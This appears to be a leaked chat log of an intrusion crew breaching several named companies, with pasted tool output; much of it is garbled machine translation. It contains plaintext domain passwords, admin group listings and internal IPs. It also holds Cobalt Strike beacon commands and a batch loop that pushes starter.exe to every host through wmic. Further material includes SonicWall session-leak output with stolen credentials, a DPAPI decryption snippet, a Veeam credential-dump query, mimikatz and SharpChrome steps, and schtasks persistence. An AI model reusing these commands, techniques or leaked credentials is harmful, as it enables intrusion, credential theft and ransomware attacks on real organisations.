\79151W10P.Wilsonart.com/ADMIN$ - Remote Admin
\79151W10P.Wilsonart.com\C$ - Default share
\79151W10P.Wilsonart.com\IPC$ - Remote IPC
\ITWDS02.Wilsonart.com/ADMIN$ - Remote Admin
\ITWDS02.Wilsonart.com\C$ - Default share
\ITWDS02.Wilsonart.com\D$ - Default share
\ITWDS02.Wilsonart.com\DeploymentShare$ -
\ITWDS02.Wilsonart.com\IPC$ - Remote IPC
\ITWDS02.Wilsonart.com\REMINST - Windows Deployment Services Share
\ITWDS02.Wilsonart.com/Users -
\79904W10P64.Wilsonart.com\ADMIN$ - Remote Admin
\79904W10P64.Wilsonart.com\C$ - Default share
\79904W10P64.Wilsonart.com\IPC$ - Remote IPC
\74181W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74181W7P.Wilsonart.com\C$ - Default share
\74181W7P.Wilsonart.com/D$ - Default share
\74181W7P.Wilsonart.com\IPC$ - Remote IPC
\74181W7P.Wilsonart.com/X$ - Default share
\79192W10P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\79192W10P.Wilsonart.com$ - Default share
\79192W10P.Wilsonart.com/IPC$ - Remote IPC
\77403W10P.Wilsonart.com/ADMIN$ - Remote Admin
\77403W10P.Wilsonart.com$ - Default share
\77403W10P.Wilsonart.com/IPC$ - Remote IPC
\78715W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78715W10P.Wilsonart.com\C$ - Default share
\78715W10P.Wilsonart.com/IPC$ - Remote IPC
\78715W10P.Wilsonart.com\print$ - Printer Drivers
\\RICOH MP C3503 - RICOH MP C3503
\UKWAS01.Wilsonart.com/ADMIN$ - Remote Admin
\UKWAS01.Wilsonart.com\C$ - Default share
\UKWAS01.Wilsonart.com/IPC$ - Remote IPC
\UKWAS01.Wilsonart.com/NETLOGON - Logon server share
\UKWAS01.Wilsonart.com/SYSVOL - Logon server share
\UKWAS01.Wilsonart.com/Test -
\L79009W10P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\L79009W10P.Wilsonart.com\C$ - Default share
\L79009W10P.Wilsonart.com\IPC$ - Remote IPC
\73689W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73689W7P.Wilsonart.com\C$ - Default share
\73689W7P.Wilsonart.com/IPC$ - Remote IPC
\73923W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73923W7P.Wilsonart.com\C$ - Default share
\73923W7P.Wilsonart.com/IPC$ - Remote IPC
\79214W10P.Wilsonart.com/ADMIN$ - Remote Admin
\79214W10P.Wilsonart.com\C$ - Default share
\79214W10P.Wilsonart.com\IPC$ - Remote IPC
\DCVEEAM02.Wilsonart.com/ADMIN$ - Remote Admin
\DCVEEAM02.Wilsonart.com\C$ - Default share
\DCVEEAM02.Wilsonart.com\E$ - Default share
\DCVEEAM02.Wilsonart.com\F$ - Default share
\\{\DCVEEAM02.Wilsonart.com/G$ - Default share
\\{\DCVEEAM02.Wilsonart.com/H$ - Default share
\DCVEEAM02.Wilsonart.com\I$ - Default share
\DCVEEAM02.Wilsonart.com\IPC$ - Remote IPC
\DCVEEAM02.Wilsonart.com/J$ - Default share
\DCVEEAM02.Wilsonart.com\K$ - Default share
\\DCVEEAM02.Wilsonart.com\L$ - Default share
\\DCVEEAM02.Wilsonart.com\M$ - Default share
\DCVEEAM02.Wilsonart.com\N$ - Default share
\DCVEEAM02.Wilsonart.com\O$ - Default share
\DCVEEAM02.Wilsonart.com\P$ - Default share
\ED79160W10P.Wilsonart.com/ADMIN$ - Remote Admin
\ED79160W10P.Wilsonart.com$ - Default share
\ED79160W10P.Wilsonart.com/IPC$ - Remote IPC
\76406W7E64.Wilsonart.com/ADMIN$ - Remote Admin
\76406W7E64.Wilsonart.com\C$ - Default share
\76406W7E64.Wilsonart.com/IPC$ - Remote IPC
\73860W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73860W7P.Wilsonart.com\C$ - Default share
\73860W7P.Wilsonart.com\IPC$ - Remote IPC
\dcwas88.Wilsonart.com/ADMIN$ - Remote Admin
\dcwas88.Wilsonart.com\C$ - Default share
\dcwas88.Wilsonart.com\D$ - Default share
\dcwas88.Wilsonart.com\E$ - Default share
\dcwas88.Wilsonart.com\IPC$ - Remote IPC
\dcwas88.Wilsonart.com\print$ - Printer Drivers
\ES79799W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\ES79799W10P64.Wilsonart.com\C$ - Default share
\ES79799W10P64.Wilsonart.com\IPC$ - Remote IPC
\78179W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78179W7P.Wilsonart.com\C$ - Default share
\78179W7P.Wilsonart.com/IPC$ - Remote IPC
\75537W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\75537W7P.Wilsonart.com\C -
\75537W7P.Wilsonart.com$ - Default share
\\\75537W7P.Wilsonart.com\HP LJ300-400 color M351-M451 PCL 6 (Copy 1) - HP LJ300-400 color M351-M451 PCL 6 (Copy 1)
\\75537W7P.Wilsonart.com\IPC$ - Remote IPC
\\Print$ - Printer Drivers
\\76032W10E.Wilsonart.com/ADMIN$ - Remote Admin
\\{\76032W10E.Wilsonart.com/C$ - Default share
\76032W10E.Wilsonart.com/D$ - Default share
\\76032W10E.Wilsonart.com\Downloads -
\76032W10E.Wilsonart.com\E$ - Default share
\76032W10E.Wilsonart.com/F$ - Default share
\76032W10E.Wilsonart.com\IPC$ - Remote IPC
\\76032W10E.Wilsonart.com\ISOs -
\76032W10E.Wilsonart.com\print$ - Printer Drivers
\\76032W10E.Wilsonart.com\Users -
\\76032W10E.Wilsonart.com\VMShare -
\\75574W7P.Wilsonart.com\ADMIN$ - Remote Admin
\75574W7P.Wilsonart.com/C$ - Default share
\75574W7P.Wilsonart.com/IPC$ - Remote IPC
\\QABIHFM.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIHFM.Wilsonart.com$ - Default share
\\QABIHFM.Wilsonart.com/D$ - Default share
\\QABIHFM.Wilsonart.com
\QABIHFM.Wilsonart.com FFDMEE -
\\QABIHFM.Wilsonart.com IPC$ - Remote IPC
\\QABIHFM.Wilsonart.com/ODI_Migrations -
\DCWAS09.Wilsonart.com/ADMIN$ - Remote Admin
\\DCWAS09.Wilsonart.com DC$ - Default share
\DCWAS09.Wilsonart.com/F$ - Default share
\DCWAS09.Wilsonart.com\IPC$ - Remote IPC
\\Print$ - Printer Drivers
\\RicohSecurePrint - Ricoh Secure Print
\EL77610W10E.Wilsonart.com/ADMIN$ - Remote Admin
\EL77610W10E.Wilsonart.com\C$ - Default share
\EL77610W10E.Wilsonart.com/IPC$ - Remote IPC
\PRDBITAB.Wilsonart.com/ADMIN$ - Remote Admin
\PRDBITAB.Wilsonart.com/Backups -
\PRDBITAB.Wilsonart.com\C$ - Default share
\\PRDBITAB.Wilsonart.com\D$ - Default share
\PRDBITAB.Wilsonart.com\Essbase_Extract_for_Tableau -
\PRDBITAB.Wilsonart.com\IPC$ - Remote IPC
\78220W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78220W7P.Wilsonart.com$ - Default share
\78220W7P.Wilsonart.com/IPC$ - Remote IPC
\EL80150W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\EL80150W10P64.Wilsonart.com\C$ - Default share
\EL80150W10P64.Wilsonart.com\IPC$ - Remote IPC
\EL80150W10P64.Wilsonart.com\print$ - Printer Drivers
\LWDA-DC.Wilsonart.com\Accounting -
\LWDA-DC.Wilsonart.com/ADMIN$ - Remote Admin
\LWDA-DC.Wilsonart.com\C$ - Default share
\LWDA-DC.Wilsonart.com\CADCode -
\LWDA-DC.Wilsonart.com\D$ - Default share
\LWDA-DC.Wilsonart.com\DallasFiles -
\LWDA-DC.Wilsonart.com\DallasManagerFiles -
\LWDA-DC.Wilsonart.com\E$ - Default share
\LWDA-DC.Wilsonart.com\IPC$ - Remote IPC
\LWDA-DC.Wilsonart.com\morbi -
\LWDA-DC.Wilsonart.com\Scans -
\LWDA-DC.Wilsonart.com/Schedule -
\78167W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78167W7P.Wilsonart.com/C$ - Default share
\78167W7P.Wilsonart.com/IPC$ - Remote IPC
\78167W7P.Wilsonart.com/print$ - Printer Drivers
\\Ricoh M2554 - Ricoh M2554
\\DST01W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\DT01W7P64.Wilsonart.com\C$ - Default share
\DT01W7P64.Wilsonart.com/IPC$ - Remote IPC
\78735W10E64.Wilsonart.com/ADMIN$ - Remote Admin
\78735W10E64.Wilsonart.com\C$ - Default share
\78735W10E64.Wilsonart.com/IPC$ - Remote IPC
\80109W10P.Wilsonart.com/ADMIN$ - Remote Admin
\80109W10P.Wilsonart.com\C$ - Default share
\80109W10P.Wilsonart.com\IPC$ - Remote IPC
\78140W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78140W7P.Wilsonart.com$ - Default share
\78140W7P.Wilsonart.com\IPC$ - Remote IPC
``Are the balls out of the entry point?
 DCWAS39.Wilsonart.com
 DCWAS48.Wilsonart.com
 DEVBIOBI.Wilsonart.com
 DEVBIESS.Wilsonart.com
 DEVBIHFM.Wilsonart.com
 DEVBIPLN.Wilsonart.com
 DEVBIWEB.Wilsonart.com
 QABIESS.Wilsonart.com
 QABIHFM.Wilsonart.com
 QABIOBI.Wilsonart.com
 QABITAB.Wilsonart.com
 QABIWEB.Wilsonart.com~
``FAMIXXPuser9>wilsonart\rockwell
>VantgagePoint
```
beacon> shell net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[*] Tasked beacon to run: net use *\\\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.
``````
wilsonart\REPORT_BUILDER
rbuilder
```
```
wilsonart\adhesives
pword
```
```
wilsonart\flrcallctr
pword
```
```
wilsonart\flas21
flas21a
```
```
wilsonart\hyperion_Service
waglobal2014
```
```
wilsonart\trackitsql
trackit114
```
```
wilsonart\rockwell
VantgagePoint
``duplicate``.
>description: password rbuilder
>description: Generic GroupWise account for Adhesives.  Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: Service account for DCWAS08 Execel Password is VantgagePoint
``````
====== AntiVirus ======

  Engine : Symantec Endpoint Protection
  ProductEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin\WSCSavNotifier.exe
  ReportingEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin64\sepWscSvc64.exe
``````
Domain Controllers:
 Server Name IP Address
 ----------- ----------
 DCWAS01 170.7.2.220
 TNWAS01 170.7.14.203
 FLWAS01 170.7.20.220
 UKWAS01 170.7.70.210
 FRWAS02 172.25.168.125
 DRWAS01 170.7.132.51
``dk``.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
```
 
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
fowlerh lucase petersm2
polyreyadmin roeders
```
 
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
cdwsetup
whsetup
WILSONART\Domain Admins
where are the lists ea dk la daa check 1 on ad usersponti not run the batcher with 6 commands check one command at a time but i advise you to be sured take everything off and it seems to be taken off like a quarantine will be like in the last griddon't touch at all or try to remove?+ the quarantines he trusts himself 7 times there but there are many fewer of them here and so do the kerbsvot)a trust is a trust (depending on the connections between them) get it worked out the keyatrasts are removed without admin rights so without fucking around like I do inside the network there's no one else to go around okay I understand you got fucked with the trusts the rest we'll see in the process theoretically yes as long as you're on the domain wide webcam it's just a matter of putting in the crosses it's all possible calling the piped commands in the batch is consistently better if you put in the crosses
minimizes bugs under the token not plus I would add YES crosses to run vmice just in case change it to cmd / ok, got it, remove gzpnez run what is "run" anyway? run why?) and tweaked it incorrectly therec:\starter.exe and by the way, better to copy directly to the root
wmicexec_command (can't remember the exact name of the msg module, but something like that)
they both even take hashes if you don't have clears at hand in any way.Then run them you can just spread the "first part" of the batch files you can also psekzekomno you can vmik by YES
this will "go" easier
vmik really will not run from the systema stask is necessary? vmik will not run this exeсhnik easier? the second part where sstask - awfulnapernaya part okv files i had it from somewhere nu okainet.no? it like right on the mdsn there.so you wrote it you at least read the syntax schtasks ?some nonsense in will not live itself? `` ``
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt
``@tl2 add me in fusionfirst.local+slypad flewKidai, we have to wait until the working day in texas is over.
because we're already falling asleep, my head does not work ... and in general, what I meant about "sensitive" network - rather a serious monitoring events, where the whole network is covered by EDR agents, monitoring systems, and other bugs and again ... hack is a thing "not static", something will close - something will open which is little different from the real hell Azure clouds just provide right out of the box their Azure-ADmicrosoft is moving towards the introduction of their clouds in the first place if we talk about "not a small" network with these settings it can not administer it roughly speakingthis network simply will not work@user1 what you described is not possible in practiceesdonate the enemy freeze and lagmas are still a little too much work with "sensitive" networks - but when it comes to these ... in general, you already understand that you can "break everything" even with a VPN. and sometimes this is the only method ... there will be many cases where it can be used outside the context of specific users by manipulating even remotely the file system and domainmogranomogromnuyu plus, here guides are inappropriate slightly such "direct" because it is one of the key storage mechanisms of kredevo
the essence of DPAPI attack this is a question you should ask yourself)))) rhetorical question:grin:fuck, I spent all night this masterkey and did not get anything in the end, throw all in sprouselawdobavl) tell me who to add to this confab it's time to add all of us to this confab so no one there did not dovabile Chet@user7 if it applies to any grid - please throw in the appropriate confabstealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/mimikatz is it able to change back to known? no, password ok. but how to change the hash?
you can do it with .
you can just go through the kmdata I don't know where to go more))
change
user
password)
lol
or the question is how to do it more convenient? and can you elaborate)) on the hash that he had change then go back to him underneath 1qwerty1 I searched for configurations, did not find (you can set the user ntlm hash of any known cleartext password `` ``
so you're looking for a cleartext, plus you can set your password hash to a user and then change it back
```
i think i wrote it clearly.config searched for password plus'a itself? under the right user can not log in under ntlm and deployment in your own place and full download the folder with the client there are a million variants that "no"? on rd tried to go where the client stands?
if it's not possible to erase it, then it's not possible to enter where the client is standing, so look for cleartext, plus you can set your password hash to the user and then change it back no cleartext from rdn and no connection via ntlm? the client that sends@user9 to the cloud with web authorization? with the cloud - look for cloud and treem there - everything is simple here
If you can't overwrite it, it means there's nothing on our network yet...
all the computers have been searched, people don't leave passwords in chrome files
there's Passwords Plus - they store passwords there, but it's in the cloud and you can't get it BUT you can fight them, they might be available through some interface and you can overwrite all the tapes, there's even a demagrid function in the closet sometimes) this cold tape backups is probably the hardest, and often impossible to solve and they usually have EVERYTHING to do with av/backups/directories of servers. most often all this is managed by 3-4-5 people even in large networks the main and most important!
the most important thing is to study the contents of the tacs/howdirs/browsers of the IT people. Only with experience will you figure out how to work with them. just read the docs...veeam, acronis, ironmount, etc. practically everywhere +- same backup is used in general, as for the backup@user9 yes. here's an example of a fucking backup
well get it yes, java gobbling up. decide 4 gb max 2x24x4 tiles? comps are ancient ugu16 gig total? ddr2?????? we have ddr2 at 4g slots no more. and some mothers do not support more?
```
Acronis Backup 11.7 Management Console 11.7.50058
"Worse than Explorer on Windows
Okay, I heard about the RAM, but it's faster. The fucking RAM is eating everything. I'm running out of RAM. What does System Load show? does it gobble up RAM?
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * Using CryptUnprotectData API
 * volatile cache: GUID:{de823842-69eb-4af0-a1b0-d6b9625b796f};KeyHash:883bc94ae7ab70b09830fab37259abfc3cdf7fc9;Key:available
 * masterkey : 51a6f051e98d0d633d79bacbb355e3a5712c4f8a14f31fe332bb587047635a22e19cce783bb6cf8927eb9b590159f059e069a26186ce651e3aba7db2481f04d1
Password:
```

```
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * using CryptUnprotectData API
 * volatile cache: GUID:{2539f04d-b7c0-487a-97d8-c818e2889122};KeyHash:003f69a0852d9f879bebbfe1aaad91d7fcac9b34;Key:available
 * masterkey : fa0ee6549e47088279eafd681cc050d2f5f15a2618d818c9f286532ceeef0c10aaf31c26d4d4a5d1e226380e383a8626fd1cbaf4d165e47a75791a809adb682a
Password:
```

:zany_face:Computers hang demonically! You can not just open the kobu browser and notepad!
`8. you have three now, do you need more? if so - tell me which servers and how many you need `as needed so, gentlemen, on questions

1. smb_login with creeds on DK / net use on DK / login to outlook or webmail (if domain authorization is tied) / ldap_login (https://github.com/lanjelot/patator) e.g. by patator
2. First part - rudimentary LM hash, you can safely forget about what it is we have and will always be the same, the second - NTLM hash, actually the one that we use often for authorization
3. will be later, you can set up tasks through the admin interface for hash decrypt and bruteforce passwords/docs/excelniks
4. https://github.com/0xthirteen/StayKit - all the fixing techniques are described here and divided into categories and levels of privileges, there's nothing to describe here in more detail, there are no "unique" techniques for the Windows systems for years. There are alternative things such as web shells on web servers (this is aspx code which is placed on the webserver, in this case IIS where the functional application "lives" - most often and most conveniently placed on the exchenge), there is an IIS module. So far, stop at stay-kit'e because it gives insight, in the future just give you a handy tool to fix it simply by running a dll
5. everything on the network is administered by people. the key to getting the most detailed data on the studied IS is in the admins / network engineers. That includes digrams and accesses and everything else. You can only use them to identify cloud or taped backups or circumstantial evidence (services/tasks on critical servers, hell records, etc.).
6. the question is incorrect. it does not "need" to do, smb_pipe is essentially just a kind of load which is +- technically equal to bind paiload in metasploit, used for machines with authorization restrictions or for machines that can not give outward access on the standard http(s)/dns/tcp protocol, that is jump psexec(_psh) 10.0.0.1 pipe is a service creation for bind pipe which then connects the initiating machine
7. give you the builder of the dll files
8. You now have three of them, you need more? If so, tell me which servers and how many you need
9. Why does it hang? I do not know.
192.168.100.240
192.168.100.238
192.168.100.248
192.168.100.237
192.168.100.245
192.168.100.230
192.168.100.219
192.168.100.228
````SPROUSELAW\administrator 1ylft1tmtS_6963 ``it's ok, it's ok, I got kicked out of the new rocket, it's alive now```.
+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv

[+] Leaking sessions to dump configuration.
     [+] Found: SessionID: P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck= userType: 1 userName: hemrick Password: HEcbccanal20201996 Domain: CANALBARGE
[+] Done with https://50.233.57.77, found 1 sessions
1
[+] Saving session data
[+] Trying session P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck=
[+] Saving config to ./Dumps/50.233.57.77/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 209 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds :@10.0.10.12
[+] AD creds :@10.0.10.12

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 115, 'name': 'net extender', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jhecht'}
``into the access''.
1. https://50.233.57.77
2fa, there's nothing in the bookmarks, backup codes don't work
```
Try to add your bookmark here ``1. https://50.233.57.77``
2fa, there's nothing in the bookmarks, backup codes don't work
 
`2. https://173.247.171.106` - #grantweber-com
have access to nas and to av, no to the sphere, looked everywhere, can close172.81.67.174 (retif.com) no creds from NAS that in work from them (skype ip) and at what stage or for what reason is not in work3 vpna issued so tell me tipshotpay friends really want to sleep, very hung up today
tomorrow, tell @tl1 he will order a new one and shoot this one if there is trouble) or a new domain, I don't know) fix kobuuli plzili 5 minutes hangs on, then resets again u user4 session alive
i think i have a problem with cobalt domainlists of all lA's wherever they were taken, send them to the groupada, almost the same everywhere and do not roll on the server from all 10 were taken off lA? 10 + and how many user's? and check just net view on this host on the user's go[ ](https://mediaeveryone.com/channel/general?msg=pRohhnJJx2iZKt2ct) and on the user's? in lps write a new passport access to change the password where he writes that he has access to the balls admin$ remote and tds what servers? without a domain not allowed, but we removed users from the servers, and there is no this user and his group without a domain? yes
says just usmb_login what does it say to these hosts? and you have checked all hosts? user8 no, I will not say the parameters, and the context was microadmin (nddevbernst)and what was the context at the time of launch and parameters? but it does not go there no many where admin sharytam was above outputuser8 ran, all outputs did not work lol you have not run before? there 20500 pc)Invoke-ShareFinder works, but tightly see the domain?
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.

```
Is there anything you can do about it?) **deadly wait **sessions will not wait for file in cis32 directory and disallow its deletion``.
The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
this is what i don't understand, it seems to move the dll to cis32 and ros.exe to run it, it's not only move it, but run it as a LA to the file and it gives us the ability to run it as an admin, we have access only to the file and it's there, ok, we run it as a user without rights, it gives you user rights if you're an admin?))[ ](https://mediaeveryone.com/channel/general?msg=SbqzTPKW2M9FeShdA) and not vice versa? And in this case we have rights to run our file from this pathThe point is that this cis32 lies in the admin$ ball and if you have access there, it gives you admin rights/systemIt's clear. But as I understand the whole point of this movement is to put your file in istem32 without rights. And then this fact should be used in some way. But how it is not clear. It seems, that there you can run applications from it, which UAC will not swear, but I am not sure) for according to the author's article, when loop ntuser.pol works it removes the file from system32but its essence is that it monitors when file is created and prohibits its deletion.exe?[ ](https://mediaeveryone.com/channel/general?msg=E8XQ2yp8EmqGYw4xB) as far as I understand it is very simple, but I could be wrong[ ](https://mediaeveryone.com/channel/general?msg=sHoWE5nicZ62h7BrQ) well, it exists now, but in new sessions not a fact)Well, the implementation is a little bit vague)I read, but users on computers did not find it. Yes, and the system is everywhere[ ] (https://mediaeveryone.com/channel/general?msg=a7JZYiR6HocfAtrhj) who checked? still the same at 10 +-[ ] (https://mediaeveryone.com/channel/general?msg=KAc6NFyvxPs9ZcrNy) current users are nowhere else LA?[ ] (https://mediaeveryone.com/channel/general?msg=uWyh8hz2oxQYBmsQM) with what? by the way, what about ava? about what time? still the same, can not get YES and can not get on the cars that interest us, so what do we have on the current grid?aha okada, a week ago + I told you all the new cobs? a little later I will say new sessions today will be daponyalon Tutu 3 again I fucked up ... those who are in the network I now 4 7 9user8 sickly4) I have rocket lag or you only 3 now? Hello Hello all on new now to clarify - while with the old let me refineEast old do not know where to go to the oldDa, while in the old. New will be? hello everyone)
there's a session to work with? hello more changed[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=Jt67LB3EmuYsCRw7w) .[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=bdH8rCxfysTudq6WW) you said it was broken then) the same thing with the password there was a case I do not remember what network then it is not broken
``[Execute-assembly /home/input0/Cobalt/tools/Ghostpack-CompiledBinaries-master/SharpChrome.exe logins /pvk:C:\ProgramData\ntds_capi_0_93f29a7d-eed3-4c1f-99bf-ebeb7603cd2d.keyx.rsa.pvk
``4 scripthttp://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=LscPbvhi5ygophcfK) did not understand the outdateddpapi year mod is not removed crooked? All that is chrome and chromium? There is a polzak that walks but the password is not removed above I discounted how it is removed crooked
```
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$ ?c$C?
``[bleep][ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=2MeFgAscWkyBk65Jc) it's in the cloud.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
internal static class Program
	{
	private static void Decrypt(string b,string a){
		if (string.IsNullOrEmpty(a))
		{
			return;
		}
		byte[] encryptedData = Convert.FromBase64String(a);
		Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine));
		return;
	}
	private static void Main(string[] args)
		{
			Decrypt("bakkeOffice,"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAGyv+yhssxEaNJF2obQfCSwQAAAACAAAAAAAQZgAAAAEAACAAAADMbPI8UL6dI5ivLmmtbfPselp0losssqbnFyWIqg29eAAAAAAOgAAAAAIAACAAAACnK/tIFTdbgO3ok5+WFnVl/d/uIE8YgcLB4YG5seXZVxAAAABLnxZoyMe7WVmWzeeRMB4CQAAAAIoDxg8RrE5TlSrxAt7CBh+arMdVWKWT0SCoWio0nUMPFXBBSP5NQ0tWZd5V8r6WzOqKWVYWOHBBocQR61bQx98=");
		}
 }
}
``````
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,49264 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
We want to access the server to the remote desktop group and check Credentials from vyam. Alas not let ``.
    BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?
    BALLYMOREGROUP\CITAdministrator L0ndonT0w3r2009!
    BALLYMOREGROUP\bespadmin drithEyuDAZ07ac
    BALLYMOREGROUP\nreid D0niford1259!
``You already? You need a new kobanet, you didn't get it.``
i found the creeds and from yes
and the accesses to the dk
and accesses to servers where yes and damin sit, but the creeds have changed a month ago, and those that are - are outdated(lsadump::cchenet I mean mscache?
```
mimikatz vault::cred
I saw another one on the nc, vault::cred is updated once a month 7 months ago I think the module you use is from what year?
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 11/30/2020 14:48:14 bookmarkbackups
          dir 11/30/2020 14:45:10 crashes
          dir 11/30/2020 14:55:45:45 datareporting
          dir 11/30/2020 14:44:13 gmp
          dir 06/17/2020 20:55:20 gmp-eme-adobe
          dir 06/17/2020 20:55:21 gmp-gmpopenh264
          dir 06/17/2020 20:55:25 gmp-widevinecdm
          dir 06/17/2020 20:53:51 minidumps
          dir 11/30/2020 14:55:45 saved-telemetry-pings
          dir 11/30/2020 14:55:45 sessionstore-backups
          dir 06/17/2020 20:54:19 storage
 24b fil 06/17/2020 20:54:14 addons.json
 0b fil 11/30/2020 14:55:45 AlternateServices.txt
 238kb fil 01/25/2017 11:52:36 blocklist.xml
 64kb fil 11/30/2020 14:55:45 cert8.db
 208b fil 11/30/2020 14:44:08 compatibility.ini
 967b fil 06/17/2020 20:54:15 containers.json
 224kb fil 06/17/2020 20:54:10 content-prefs.sqlite
 512kb fil 11/30/2020 14:55:45 cookies.sqlite
 185b fil 06/17/2020 20:54:09 extensions.ini
 5kb fil 06/17/2020 20:54:13 extensions.json
 192kb fil 11/30/2020 14:47:14 formhistory.sqlite
 16kb fil 11/30/2020 14:55:45 key3.db
 3kb fil 06/17/2020 20:54:17 mimeTypes.rdf
 0b fil 11/30/2020 14:44:08 parent.lock
 96kb fil 06/17/2020 20:54:07 permissions.sqlite
 10mb fil 11/30/2020 14:55:45 places.sqlite
 3kb fil 11/30/2020 14:44:19 pluginreg.dat
 9kb fil 11/30/2020 14:55:45 prefs.js
 15kb fil 11/30/2020 14:44:26 search.json.mozlz4
 16kb fil 06/17/2020 20:54:07 secmod.db
 288b fil 11/30/2020 14:55:45 sessionCheckpoints.json
 878b fil 11/30/2020 14:55:45 sessionstore.js
 598b fil 11/30/2020 14:55:45 SiteSecurityServiceState.txt
 512b fil 06/17/2020 20:54:18 storage.sqlite
 29b fil 06/17/2020 20:53:51 times.json
 96kb fil 06/17/2020 20:55:27 webappsstore.sqlite
 257b fil 11/30/2020 14:55:45:45 xulstore.jso
Give me the profile listingmay not have any saved inputs in mozilla I hope with a fresh head we'll solve it quickly in the morning with mozilla, I can't do anything today if you have a problem with snapshots tomorrow we can't start we'll finish tomorrow?so guys the profile is appdata if he has an active session there you will immediately catch it, now + history get his saved passwords, and decrypt and on the local dedicecheck his profile under socket all is simple, you need to get the folder of the profile itself easy mozilla, well ej with esplorer it good no see, try to see what in fsa c$ see?rpc is cnavaliblE does it work?[ ](https://mediaeveryone.com/group/gophersport-com?msg=6JavGHLQrPMDzWvsG) cheated)) only psekzek workswmik works you saidprogramprogramfileslists processova how to know?[ ](https://mediaeveryone.com/group/gophersport-com?msg=b5o5shtSzFkKDFgmQ) -web browser nekoKa[ ](https://mediaeveryone.com/group/gophersport-com?msg=is74ecCBrPYSLJtXx) ?then answer the question I asked an hour ago it's not the command. the other arm is so pulled[ ](https://mediaeveryone.com/group/gophersport-com?msg=bBQffPSigsmYun92B) `shell SCHTASKS /Create /S 10.22.0.13 /u gophersport.local\schtask /p rehpog2013! /tn "OnDemand checking" /tr "cmd.exe /c rundll32 c:\windows\system32\shc.dll entryPoint" /sc onstart /RU SYSTEM `dll that you scrambled, seems to work but the session dies very quickly. winrms and vmi and psek seems to work, but the session does not come. shtask disabled like `ERROR: The request is not supported.` so you have here what? so we have not even seen the browser, what kind of browser he has?we can not get on the armies and the admin too in his browser? have found the sphere, but no credits found it? still there is a nuance with the whole sphere, try to get to the admins on the computer, go to work with your colleagues if there 100% sure in everythingbecaps, virtualization, av and so on then super) you have a network all? already all ready then the build should be ready today, so do not wait until tomorrow key then I think 6 `` is enough
-size[10/15/20/25/30/35/40/45/50/60/70/80]
